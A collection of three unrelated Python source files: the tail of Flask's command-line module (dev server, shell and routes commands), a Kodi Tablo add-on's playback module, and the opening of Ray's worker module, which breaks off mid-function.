:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
if ssl is None:
raise click.BadParameter(
'Using "--cert" requires Python to be compiled with SSL support.',
ctx,
param,
)
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import cryptography # noqa: F401
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires the cryptography library.",
ctx,
param,
) from None
return value
obj = import_string(value, silent=True)
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
is_context = ssl and isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
class SeparatedPathType(click.Path):
"""Click option type that accepts a list of values separated by the
OS's path separator (``:``, ``;`` on Windows). Each value is
validated as a :class:`click.Path` type.
"""
def convert(self, value, param, ctx):
items = self.split_envvar_value(value)
super_convert = super().convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loading",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
f" are separated by {os.path.pathsep!r}."
),
)
@pass_script_info
def run_command(
info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command() -> None:
"""Run an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to its configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from .globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = (
f"Python {sys.version} on {sys.platform}\n"
f"App: {app.import_name} [{app.env}]\n"
f"Instance: {app.instance_path}"
)
ctx: dict = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup) as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
# Site, customize, or startup script can set a hook to call when
# entering interactive mode. The default one sets up readline with
# tab and history completion.
interactive_hook = getattr(sys, "__interactivehook__", None)
if interactive_hook is not None:
try:
import readline
from rlcompleter import Completer
except ImportError:
pass
else:
# rlcompleter uses __main__.__dict__ by default, which is
# flask.__main__. Use the shell context instead.
readline.set_completer(Completer(ctx).complete)
interactive_hook()
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort: str, all_methods: bool) -> None:
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods)) # type: ignore
rule_methods = [
", ".join(sorted(rule.methods - ignored_methods)) # type: ignore
for rule in rules
]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main() -> None:
if int(click.__version__[0]) < 8:
warnings.warn(
"Using the `flask` cli with Click 7 is deprecated and"
" will not be supported starting with Flask 2.1."
" Please upgrade to Click 8 as soon as possible.",
DeprecationWarning,
)
# TODO omit sys.argv once https://github.com/pallets/click/issues/536 is fixed
cli.main(args=sys.argv[1:])
if __name__ == "__main__":
main()
|
player.py
|
import xbmc
import xbmcgui
import threading
import copy
import os
import urllib
from lib import util
from lib.tablo import bif
from lib.windows import kodigui
from lib.util import T
class TrickModeWindow(kodigui.BaseWindow):
name = 'TRICKMODE'
xmlFile = 'script-tablo-trick-mode.xml'
path = util.ADDON.getAddonInfo('path')
theme = 'Main'
IMAGE_LIST_ID = 100
PROGRESS_IMAGE_ID = 200
PROGRESS_SELECT_IMAGE_ID = 201
PROGRESS_WIDTH = 880
PROGRESS_SELECT_IMAGE_X = 199
PROGRESS_SELECT_IMAGE_Y = -50
def __init__(self, *args, **kwargs):
kodigui.BaseWindow.__init__(self, *args, **kwargs)
self.url = kwargs.get('url')
self.callback = kwargs.get('callback')
self.playlist = kwargs.get('playlist')
self.select = None
self.maxTimestamp = 0
self._duration = 0
self.trickPath = os.path.join(util.PROFILE, 'trick')
if not os.path.exists(self.trickPath):
os.makedirs(self.trickPath)
self.getBif()
def onFirstInit(self):
self.imageList = kodigui.ManagedControlList(self, self.IMAGE_LIST_ID, 4)
self.progressImage = self.getControl(self.PROGRESS_IMAGE_ID)
self.progressSelectImage = self.getControl(self.PROGRESS_SELECT_IMAGE_ID)
self.fillImageList()
self.setProperty('end', util.durationToShortText(self.duration))
def onAction(self, action):
try:
self.updateProgressSelection()
if action in (xbmcgui.ACTION_STOP, xbmcgui.ACTION_NAV_BACK, xbmcgui.ACTION_PREVIOUS_MENU):
self.callback(False)
self.doClose()
except:
util.ERROR()
kodigui.BaseWindow.onAction(self, action)
def onClick(self, controlID):
if controlID != self.IMAGE_LIST_ID:
return
item = self.imageList.getSelectedItem()
if not item:
return
if self.bif:
timestamp = item.dataSource['timestamp']
else:
timestamp = float(item.getProperty('timestamp'))
self.setProgress(timestamp)
self.callback(timestamp)
def onFocus(self, controlID):
if self.select is not None:
self.imageList.selectItem(self.select)
self.select = None
@property
def duration(self):
return self._duration or self.maxTimestamp
def blank(self):
self.setProperty('show', '')
def unBlank(self):
self.setProperty('show', '1')
def setPosition(self, position):
position = min(position, self.maxTimestamp)
self.setProperty('current', util.durationToShortText(position))
util.DEBUG_LOG('TrickMode: Setting position at {0} of {1}'.format(position, self.duration))
if not (self.maxTimestamp):
return
self.setProgress(position)
self.setProgressSelect(position)
if self.bif:
i = -1
for i, frame in enumerate(self.bif.frames):
if position > frame['timestamp']:
continue
break
i -= 1
if i >= 0:
self.select = i
else:
timestamp = 0
for i, segment in enumerate(self.playlist.segments):
timestamp += segment.duration
if timestamp > position:
self.select = i
break
else:
self.select = 0
def setProgress(self, position):
if not self.started:
return
w = int((position / float(self.duration)) * self.PROGRESS_WIDTH) or 1
self.progressImage.setWidth(w)
def setProgressSelect(self, position):
if not self.started:
return
x = self.PROGRESS_SELECT_IMAGE_X + int((position / float(self.maxTimestamp)) * self.PROGRESS_WIDTH)
self.progressSelectImage.setPosition(x, self.PROGRESS_SELECT_IMAGE_Y)
self.setProperty('select', util.durationToShortText(position))
def updateProgressSelection(self):
item = self.imageList.getSelectedItem()
if not item:
return
self.setProgressSelect(float(item.getProperty('timestamp')))
def cleanTrickPath(self):
for f in os.listdir(self.trickPath):
os.remove(os.path.join(self.trickPath, f))
def getBif(self):
self.bif = None
if not self.url:
return
self.cleanTrickPath()
bifPath = os.path.join(self.trickPath, 'bif')
urllib.urlretrieve(self.url, bifPath)
self.bif = bif.Bif(bifPath)
self.bif.dumpImages(self.trickPath)
self.maxTimestamp = self.bif.maxTimestamp
util.DEBUG_LOG('TrickMode: Bif frames ({0}) - max timestamp ({1})'.format(self.bif.size, self.bif.maxTimestamp))
def fillImageList(self):
items = []
if self.bif:
for i in range(self.bif.size):
timestamp = self.bif.frames[i]['timestamp']
item = kodigui.ManagedListItem(
str(timestamp),
thumbnailImage=os.path.join(self.trickPath, str(i) + '.jpg'),
data_source=self.bif.frames[i]
)
item.setProperty('timestamp', str(timestamp))
items.append(item)
else:
timestamp = 0
for segment in self.playlist.segments:
item = kodigui.ManagedListItem(
str(timestamp),
thumbnailImage='',
data_source=segment
)
item.setProperty('timestamp', str(timestamp))
self.maxTimestamp = timestamp
timestamp += segment.duration
items.append(item)
self._duration = self.maxTimestamp
self.imageList.addItems(items)
class ThreadedWatch(object):
def __init__(self, airing, dialog):
self.dialog = dialog
self.airing = airing
self.watch = None
self.thread = None
def __enter__(self):
return self.start()
def __exit__(self, exc_type, exc_value, traceback):
pass
def start(self):
self.thread = threading.Thread(target=self.watchThread)
self.thread.start()
return self
def watchThread(self):
util.DEBUG_LOG('ThreadedWatch: Started')
self.watch = self.airing.watch()
util.DEBUG_LOG('ThreadedWatch: Finished')
def getWatch(self):
util.DEBUG_LOG('ThreadedWatch: getWatch - Started')
while self.thread.isAlive() and not self.dialog.canceled:
self.thread.join(0.1)
util.DEBUG_LOG('ThreadedWatch: getWatch - Finished')
return self.watch
class PlayerHandler(object):
def __init__(self, player):
self.player = player
self._thread = threading.Thread()
self.init()
def init(self):
pass
def play(self):
raise NotImplementedError
def startWait(self):
if not self._thread.isAlive():
self._thread = threading.Thread(target=self.wait)
self._thread.start()
def onPlayBackStarted(self):
pass
def onPlayBackStopped(self):
pass
def onPlayBackEnded(self):
pass
def onPlayBackSeek(self, time, offset):
pass
def onPlayBackFailed(self):
pass
def onVideoWindowClosed(self):
pass
def onVideoWindowOpened(self):
pass
def waitForStop(self):
self._waiting.wait()
class RecordingHandler(PlayerHandler):
def init(self):
self.playlistFilename = os.path.join(util.PROFILE, 'pl.m3u8')
self.reset()
def reset(self):
self.airing = None
self.watch = None
self.trickWindow = None
self.item = None
self.finished = False
self.startPosition = 0
self.softReset()
def softReset(self):
self._waiting = threading.Event()
self._waiting.set()
self.position = 0
self.seeking = False
self.playlist = None
self.segments = None
@property
def absolutePosition(self):
return self.startPosition + self.position
def makeSeekedPlaylist(self, position):
m = self.playlist
m.segments = copy.copy(self.segments)
if position > 0:
duration = m.segments[0].duration
while duration < position:
del m.segments[0]
if not m.segments:
break
duration += m.segments[0].duration
m.dump(self.playlistFilename)
def setupTrickMode(self, watch):
self.trickWindow = TrickModeWindow.create(url=watch.bifHD, callback=self.trickWindowCallback, playlist=self.watch.getSegmentedPlaylist())
def play(self, rec, show=None, resume=True):
self.reset()
self.airing = rec
watch = rec.watch()
if watch.error:
return watch.error
self.watch = watch
title = rec.title or (show and show.title or '{0} {1}'.format(rec.displayChannel(), rec.network))
thumb = show and show.thumb or ''
self.item = xbmcgui.ListItem(title, title, thumbnailImage=thumb, path=watch.url)
self.item.setInfo('video', {'title': title, 'tvshowtitle': title})
self.item.setIconImage(thumb)
self.playlist = watch.getSegmentedPlaylist()
self.segments = copy.copy(self.playlist.segments)
self.setupTrickMode(watch)
if rec.position and resume:
util.DEBUG_LOG('Player (Recording): Resuming at {0}'.format(rec.position))
self.playAtPosition(rec.position)
else:
util.DEBUG_LOG('Player (Recording): Playing from beginning')
self.playAtPosition(0)
# self.player.play(watch.url, self.item, False, 0)
return None
def trickWindowCallback(self, position):
if position is False:
return self.finish(force=True)
self.playAtPosition(position)
def playAtPosition(self, position):
self.startPosition = position
self.position = 0
self.makeSeekedPlaylist(position)
self.trickWindow.setPosition(self.absolutePosition)
self.player.play(self.playlistFilename, self.item, False, 0)
def wait(self):
self._waiting.clear()
try:
cacheCount = 0
while (self.player.isPlayingVideo() or self.seeking) and not xbmc.abortRequested:
if xbmc.getCondVisibility('Player.Seeking'):
self.onPlayBackSeek(self.position, 0)
elif self.player.isPlayingVideo():
self.position = self.player.getTime()
xbmc.sleep(100)
if xbmc.getCondVisibility('Player.Caching') and self.position - self.startPosition < 10:
cacheCount += 1
if cacheCount > 4 and not xbmc.getCondVisibility('IntegerGreaterThan(Player.CacheLevel,0)'):
util.DEBUG_LOG(
'Player (Recording): Forcing resume at {0} - cache level: {1}'.format(self.position, xbmc.getInfoLabel('Player.CacheLevel'))
)
xbmc.executebuiltin('PlayerControl(play)')
cacheCount = 0
else:
cacheCount = 0
if self.position:
util.DEBUG_LOG('Player (Recording): Saving position [{0}]'.format(self.absolutePosition))
self.airing.setPosition(self.absolutePosition)
finally:
self._waiting.set()
self.finish()
def onPlayBackStarted(self):
try:
self.trickWindow.setPosition(self.absolutePosition)
self.trickWindow.blank()
except:
util.ERROR()
self.startWait()
def onPlayBackSeek(self, time, offset):
if self.seeking:
return
self.seeking = True
self.trickWindow.setPosition(self.absolutePosition)
self.trickWindow.unBlank()
if self.player.isPlayingVideo():
util.DEBUG_LOG('Player (Recording): Stopping video for seek')
self.player.stop()
util.DEBUG_LOG('Player (Recording): Seek started at {0} (absolute: {1})'.format(self.position, self.absolutePosition))
def onPlaybackFailed(self):
self.finish(force=True)
def onVideoWindowOpened(self):
self.seeking = False
def onVideoWindowClosed(self):
if not self.seeking:
if self.player.isPlayingVideo():
util.DEBUG_LOG('Player (Recording): Stopping video on video window closed')
self.player.stop()
def closeTrickWindow(self):
try:
if not self.trickWindow:
return
util.DEBUG_LOG('Player (Recording): Closing trick window')
self.trickWindow.doClose()
del self.trickWindow
except AttributeError:
pass
self.trickWindow = None
def finish(self, force=False):
if self.finished:
return
self.finished = True
self.seeking = False
util.DEBUG_LOG('Player (Recording): Played for {0} seconds'.format(self.position))
self.closeTrickWindow()
class LiveRecordingHandler(RecordingHandler):
def reset(self):
self.loadingDialog = None
self.seekableEnded = False
RecordingHandler.reset(self)
def softReset(self):
self.nextPlay = None
RecordingHandler.softReset(self)
def checkForNext(self):
util.DEBUG_LOG('Player (Recording): Checking for remaining live portion')
if not self.seekableEnded or not self.nextPlay:
self.finish()
return
util.DEBUG_LOG('Player (Recording): Playing live portion')
url = self.nextPlay
self.softReset()
self.loadingDialog = util.LoadingDialog().show()
self.closeTrickWindow()
self.startPosition = self.absolutePosition
self.position = 0
self.player.play(url, self.item, False, 0)
def playAtPosition(self, position):
self.startPosition = position
self.position = 0
self.makeSeekedPlaylist(position)
self.trickWindow.setPosition(self.absolutePosition)
with open(self.playlistFilename, 'a') as f:
f.write('\n#EXT-X-ENDLIST')
self.nextPlay = self.watch.url
self.player.play(self.playlistFilename, self.item, False, 0)
def saveLivePosition(self):
if self.position:
util.DEBUG_LOG('Player (Recording): Live - saving position [{0}]'.format(self.absolutePosition))
self.airing.setPosition(self.absolutePosition)
def wait(self):
RecordingHandler.wait(self)
self.checkForNext()
def waitLive(self):
if not self._thread.isAlive():
self._thread = threading.Thread(target=self._waitLive)
self._thread.start()
def _waitLive(self):
self._waiting.clear()
try:
while self.player.isPlayingVideo() and not xbmc.abortRequested:
self.position = self.player.getTime()
xbmc.sleep(100)
finally:
self._waiting.set()
self.saveLivePosition()
def onPlayBackStarted(self):
if not self.nextPlay:
self.waitLive()
return
RecordingHandler.onPlayBackStarted(self)
def onPlayBackEnded(self):
if self.nextPlay:
self.seeking = False
self.seekableEnded = True
def onPlayBackSeek(self, time, offset):
if not self.nextPlay:
return
RecordingHandler.onPlayBackSeek(self, time, offset)
def onVideoWindowOpened(self):
self.seeking = False
if not self.nextPlay:
self.closeLoadingDialog()
def onVideoWindowClosed(self):
if not self.nextPlay:
self.closeTrickWindow()
return
RecordingHandler.onVideoWindowClosed(self)
def finish(self, force=False):
if not force:
if self.seekableEnded:
return
RecordingHandler.finish(self)
def closeLoadingDialog(self):
if self.loadingDialog:
self.loadingDialog.close()
self.loadingDialog = None
class LiveTVHandler(PlayerHandler):
def init(self):
self.loadingDialog = None
self.reset()
def reset(self):
self.airing = None
self.closeLoadingDialog()
self.softReset()
def softReset(self):
self._waiting = threading.Event()
self._waiting.set()
def play(self, airing):
self.reset()
self.airing = airing
self.loadingDialog = util.LoadingDialog().show()
threading.Thread(target=self._playAiringChannel).start()
def _playAiringChannel(self):
airing = self.airing
with ThreadedWatch(airing, self.loadingDialog) as tw:
watch = tw.getWatch()
if watch:
if watch.error:
util.DEBUG_LOG('Player (LiveTV): Watch error: {0}'.format(watch.error))
xbmcgui.Dialog().ok(T(32196), T(32197), ' ', str(watch.errorDisplay))
self.closeLoadingDialog()
return watch.error
util.DEBUG_LOG('Player (LiveTV): Watch URL: {0}'.format(watch.url))
else:
util.DEBUG_LOG('Player (LiveTV): Canceled before start')
self.closeLoadingDialog()
return
self.watch = watch
title = '{0} {1}'.format(airing.displayChannel(), airing.network)
thumb = airing.thumb
li = xbmcgui.ListItem(title, title, thumbnailImage=thumb, path=watch.url)
li.setInfo('video', {'title': title, 'tvshowtitle': title})
li.setIconImage(thumb)
util.DEBUG_LOG('Player (LiveTV): Playing channel')
self.player.play(watch.url, li, False, 0)
self.loadingDialog.wait()
return None
def wait(self):
self._waiting.clear()
try:
while self.player.isPlayingVideo() and not xbmc.abortRequested:
xbmc.sleep(100)
finally:
self._waiting.set()
def onPlayBackStarted(self):
self.startWait()
def onVideoWindowOpened(self):
self.closeLoadingDialog()
def onVideoWindowClosed(self):
if self.player.isPlayingVideo():
util.DEBUG_LOG('Player (LiveTV): Stopping video')
self.player.stop()
def closeLoadingDialog(self):
if self.loadingDialog:
self.loadingDialog.close()
self.loadingDialog = None
class TabloPlayer(xbmc.Player):
def init(self):
self.reset()
self.monitor()
return self
def reset(self):
self.started = False
self.handler = None
def playAiringChannel(self, airing):
self.reset()
self.handler = LiveTVHandler(self)
return self.handler.play(airing)
def playRecording(self, rec, show=None, resume=True):
self.reset()
self.handler = RecordingHandler(self)
return self.handler.play(rec, show, resume)
def playLiveRecording(self, rec, show=None, resume=True):
self.reset()
self.handler = LiveRecordingHandler(self)
return self.handler.play(rec, show, resume)
def onPlayBackStarted(self):
self.started = True
util.DEBUG_LOG('Player - STARTED')
if not self.handler:
return
self.handler.onPlayBackStarted()
def onPlayBackStopped(self):
if not self.started:
self.onPlaybackFailed()
util.DEBUG_LOG('Player - STOPPED' + (not self.started and ': FAILED' or ''))
if not self.handler:
return
self.handler.onPlayBackStopped()
def onPlayBackEnded(self):
if not self.started:
self.onPlaybackFailed()
util.DEBUG_LOG('Player - ENDED' + (not self.started and ': FAILED' or ''))
if not self.handler:
return
self.handler.onPlayBackEnded()
def onPlayBackSeek(self, time, offset):
util.DEBUG_LOG('Player - SEEK')
if not self.handler:
return
self.handler.onPlayBackSeek(time, offset)
def onPlaybackFailed(self):
if not self.handler:
return
self.handler.onPlayBackFailed()
def onVideoWindowOpened(self):
util.DEBUG_LOG('Player: Video window opened')
try:
self.handler.onVideoWindowOpened()
except:
util.ERROR()
def onVideoWindowClosed(self):
util.DEBUG_LOG('Player: Video window closed')
try:
self.handler.onVideoWindowClosed()
self.stop()
except:
util.ERROR()
def stopAndWait(self):
if self.isPlayingVideo():
util.DEBUG_LOG('Player (Recording): Stopping for external wait')
self.stop()
self.handler.waitForStop()
def monitor(self):
threading.Thread(target=self._monitor).start()
def _monitor(self):
while not xbmc.abortRequested:
# Monitor loop
if self.isPlayingVideo():
util.DEBUG_LOG('Player: Monitoring')
hasFullScreened = False
while self.isPlayingVideo() and not xbmc.abortRequested:
xbmc.sleep(100)
if xbmc.getCondVisibility('VideoPlayer.IsFullscreen'):
if not hasFullScreened:
hasFullScreened = True
self.onVideoWindowOpened()
elif hasFullScreened and not xbmc.getCondVisibility('Window.IsVisible(busydialog)'):
hasFullScreened = False
self.onVideoWindowClosed()
if hasFullScreened:
self.onVideoWindowClosed()
# Idle loop
if not self.isPlayingVideo():
util.DEBUG_LOG('Player: Idling...')
while not self.isPlayingVideo() and not xbmc.abortRequested:
xbmc.sleep(100)
PLAYER = TabloPlayer().init()
|
worker.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import collections
import colorama
import hashlib
import inspect
import numpy as np
import os
import redis
import signal
import sys
import threading
import time
import traceback
# Ray modules
import pyarrow
import pyarrow.plasma as plasma
import ray.cloudpickle as pickle
import ray.experimental.state as state
import ray.gcs_utils
import ray.remote_function
import ray.serialization as serialization
import ray.services as services
from ray.services import logger
import ray.signature
import ray.local_scheduler
import ray.plasma
import ray.ray_constants as ray_constants
from ray import import_thread
from ray import profiling
from ray.utils import (
binary_to_hex,
check_oversized_pickle,
is_cython,
random_string,
)
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SILENT_MODE = 3
ERROR_KEY_PREFIX = b"Error:"
DRIVER_ID_LENGTH = 20
ERROR_ID_LENGTH = 20
# This must match the definition of NIL_ACTOR_ID in task.h.
NIL_ID = 20 * b"\xff"
NIL_LOCAL_SCHEDULER_ID = NIL_ID
NIL_FUNCTION_ID = NIL_ID
NIL_ACTOR_ID = NIL_ID
NIL_ACTOR_HANDLE_ID = NIL_ID
NIL_CLIENT_ID = 20 * b"\xff"
# This must be kept in sync with the `error_types` array in
# common/state/error_table.h.
OBJECT_HASH_MISMATCH_ERROR_TYPE = b"object_hash_mismatch"
PUT_RECONSTRUCTION_ERROR_TYPE = b"put_reconstruction"
# This must be kept in sync with the `scheduling_state` enum in common/task.h.
TASK_STATUS_RUNNING = 8
# Default resource requirements for actors when no resource requirements are
# specified.
DEFAULT_ACTOR_METHOD_CPUS_SIMPLE_CASE = 1
DEFAULT_ACTOR_CREATION_CPUS_SIMPLE_CASE = 0
# Default resource requirements for actors when some resource requirements are
# specified.
DEFAULT_ACTOR_METHOD_CPUS_SPECIFIED_CASE = 0
DEFAULT_ACTOR_CREATION_CPUS_SPECIFIED_CASE = 1
class RayTaskError(Exception):
"""An object used internally to represent a task that threw an exception.
If a task throws an exception during execution, a RayTaskError is stored in
the object store for each of the task's outputs. When an object is
retrieved from the object store, the Python method that retrieved it checks
to see if the object is a RayTaskError and if it is then an exception is
thrown propagating the error message.
Currently, we either use the exception attribute or the traceback attribute
but not both.
Attributes:
function_name (str): The name of the function that failed and produced
the RayTaskError.
exception (Exception): The exception object thrown by the failed task.
traceback_str (str): The traceback from the exception.
"""
def __init__(self, function_name, exception, traceback_str):
"""Initialize a RayTaskError."""
self.function_name = function_name
if (isinstance(exception, RayGetError)
or isinstance(exception, RayGetArgumentError)):
self.exception = exception
else:
self.exception = None
self.traceback_str = traceback_str
def __str__(self):
"""Format a RayTaskError as a string."""
if self.traceback_str is None:
# This path is taken if getting the task arguments failed.
return ("Remote function {}{}{} failed with:\n\n{}".format(
colorama.Fore.RED, self.function_name, colorama.Fore.RESET,
self.exception))
else:
# This path is taken if the task execution failed.
return ("Remote function {}{}{} failed with:\n\n{}".format(
colorama.Fore.RED, self.function_name, colorama.Fore.RESET,
self.traceback_str))
class RayGetError(Exception):
"""An exception used when get is called on an output of a failed task.
Attributes:
objectid (lib.ObjectID): The ObjectID that get was called on.
task_error (RayTaskError): The RayTaskError object created by the
failed task.
"""
def __init__(self, objectid, task_error):
"""Initialize a RayGetError object."""
self.objectid = objectid
self.task_error = task_error
def __str__(self):
"""Format a RayGetError as a string."""
return ("Could not get objectid {}. It was created by remote function "
"{}{}{} which failed with:\n\n{}".format(
self.objectid, colorama.Fore.RED,
self.task_error.function_name, colorama.Fore.RESET,
self.task_error))
class RayGetArgumentError(Exception):
"""An exception used when a task's argument was produced by a failed task.
Attributes:
argument_index (int): The index (zero indexed) of the failed argument
in present task's remote function call.
function_name (str): The name of the function for the current task.
objectid (lib.ObjectID): The ObjectID that was passed in as the
argument.
task_error (RayTaskError): The RayTaskError object created by the
failed task.
"""
def __init__(self, function_name, argument_index, objectid, task_error):
"""Initialize a RayGetArgumentError object."""
self.argument_index = argument_index
self.function_name = function_name
self.objectid = objectid
self.task_error = task_error
def __str__(self):
"""Format a RayGetArgumentError as a string."""
return ("Failed to get objectid {} as argument {} for remote function "
"{}{}{}. It was created by remote function {}{}{} which "
"failed with:\n{}".format(
self.objectid, self.argument_index, colorama.Fore.RED,
self.function_name, colorama.Fore.RESET, colorama.Fore.RED,
self.task_error.function_name, colorama.Fore.RESET,
self.task_error))
FunctionExecutionInfo = collections.namedtuple(
"FunctionExecutionInfo", ["function", "function_name", "max_calls"])
"""FunctionExecutionInfo: A named tuple storing remote function information."""
class Worker(object):
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
function_execution_info (Dict[str, FunctionExecutionInfo]): A
dictionary mapping the name of a remote function to the remote
function itself. This is the set of remote functions that can be
executed by this worker.
connected (bool): True if Ray has been started and False otherwise.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE,
SILENT_MODE, and WORKER_MODE.
cached_remote_functions_and_actors: A list of information for exporting
remote functions and actor classes definitions that were defined
before the worker called connect. When the worker eventually does
call connect, if it is a driver, it will export these functions and
actors. If cached_remote_functions_and_actors is None, that means
that connect has been called already.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
profiler: the profiler used to aggregate profiling information.
"""
def __init__(self):
"""Initialize a Worker object."""
# This field is a dictionary that maps a driver ID to a dictionary of
# functions (and information about those functions) that have been
# registered for that driver (this inner dictionary maps function IDs
# to a FunctionExecutionInfo object. This should only be used on
# workers that execute remote functions.
self.function_execution_info = collections.defaultdict(lambda: {})
# This is a dictionary mapping driver ID to a dictionary that maps
# remote function IDs for that driver to a counter of the number of
# times that remote function has been executed on this worker. The
# counter is incremented every time the function is executed on this
# worker. When the counter reaches the maximum number of executions
# allowed for a particular function, the worker is killed.
self.num_task_executions = collections.defaultdict(lambda: {})
self.connected = False
self.mode = None
self.cached_remote_functions_and_actors = []
self.cached_functions_to_run = []
self.fetch_and_register_actor = None
self.make_actor = None
self.actors = {}
self.actor_task_counter = 0
# A set of all of the actor class keys that have been imported by the
# import thread. It is safe to convert this worker into an actor of
# these types.
self.imported_actor_classes = set()
# The number of threads Plasma should use when putting an object in the
# object store.
self.memcopy_threads = 12
# When the worker is constructed. Record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray.utils.get_cuda_visible_devices()
self.profiler = profiling.Profiler(self)
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
raise RayConnectionError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will insead execute them in a blocking fashion.
The mode SILENT_MODE should be used only during testing. It does not
print any information about errors because some of the tests
intentionally fail.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, LOCAL_MODE, and
SILENT_MODE.
"""
self.mode = mode
def store_and_register(self, object_id, value, depth=100):
"""Store an object and attempt to register its class if needed.
Args:
object_id: The ID of the object to store.
value: The value to put in the object store.
depth: The maximum number of classes to recursively register.
Raises:
Exception: An exception is raised if the attempt to store the
object fails. This can happen if there is already an object
with the same ID in the object store or if the object store is
full.
"""
counter = 0
while True:
if counter == depth:
raise Exception("Ray exceeded the maximum number of classes "
"that it will recursively serialize when "
"attempting to serialize an object of "
"type {}.".format(type(value)))
counter += 1
try:
self.plasma_client.put(
value,
object_id=pyarrow.plasma.ObjectID(object_id.id()),
memcopy_threads=self.memcopy_threads,
serialization_context=self.serialization_context)
break
except pyarrow.SerializationCallbackError as e:
try:
register_custom_serializer(
